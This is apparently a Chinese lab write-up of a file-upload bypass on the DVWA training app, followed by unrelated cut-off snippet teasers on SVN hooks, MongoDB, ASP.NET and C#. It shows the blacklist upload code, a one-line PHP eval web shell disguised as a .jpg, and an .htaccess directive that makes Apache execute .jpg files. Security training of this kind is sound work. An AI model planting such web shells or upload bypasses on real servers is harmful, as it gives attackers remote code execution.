(1).先看靶机代码:
<?php
if (isset($_POST['Upload']))
{
    $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path = $target_path . basename($_FILES['uploaded']['name']);
    $uploaded_name = $_FILES['uploaded']['name'];
    $uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
    $uploaded_size = $_FILES['uploaded']['size'];
    $blackList = ['php', 'asp', 'exe', 'jsp', 'aspx', 'js', 'py', 'cpp', 'com', 'bat', 'dll', 'sh','html','rar','iso','zip'];
    if(in_array($uploaded_ext,$blackList))
    {
        echo '<pre>';
        echo 'Your image was not uploaded.';
        echo '</pre>';
    }
    else
    {
        if (!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path))
        {
            echo '<pre>';
            echo 'Your image was not uploaded.';
            echo '</pre>';
        }
        else
        {
            echo '<pre>';
            echo $target_path . ' succesfully uploaded!';
            echo '</pre>';
        }
    }
}
?>靶机只支持运行php脚本,但是不允许上传php。
(2).创建1个c.php.jpg文件伪装为图片文件:
<?php @eval($_POST['pass']);?>
(3).访问图片文件http://192.168.147.131/dvwa/hackable/uploads/c.php.jpg发现无法执行成功,因为服务器认为是图片文件,不允许执行
(4).上传文件.htaccess 设置允许执行.jpg文件,因为服务器是apache允许这样设置。
AddType application/x-httpd-php .jpg
(5).中国菜刀连接成功
【一】.钩子文件的设置和创建(1).打开hooks目录,可以看到有一个post-commit.tmpl文件,这是一个模板文件。复制一份,重命名为post-commit,将其用户组设为www,并设置为可执行。chown www:www post-commitchmod +x post-commit(2...
在安装之前我们先看看官方给出的依赖关系.首先是dll文件和mongodb软件的依赖关系然后是PHP文件和dll的依赖关系我的是phpstudy的集成环境PHP5.4.45 NTS+Apache+Mysql【一】.安装mongodb3.0软件对比依赖关系下载mongodb3.0.msi软件,完整名称:...
Application 对象用于存储和访问来自任意页面的变量,类似 Session 对象。不同之处在于所有的用户分享一个 Application 对象,而 session 对象和用户的关系是一一对应的。很多的书籍中介绍的Application对象都喜欢以统计在线人数来介绍Application 对象...
public static string GetMD5(string str) { //创建MD5对象 MD5 md5 = MD5.C...
private const string fantizi = "高久峰是個程序員"; private const string jiantizi = "高久峰是个程序员...
首先网页全部是纯静态的文件,本地测试正常访问,服务器端无法加载CSS,并且无法查看CSS文件的内容。 解决方案:关闭网站的压缩->>静态压缩和动态压缩...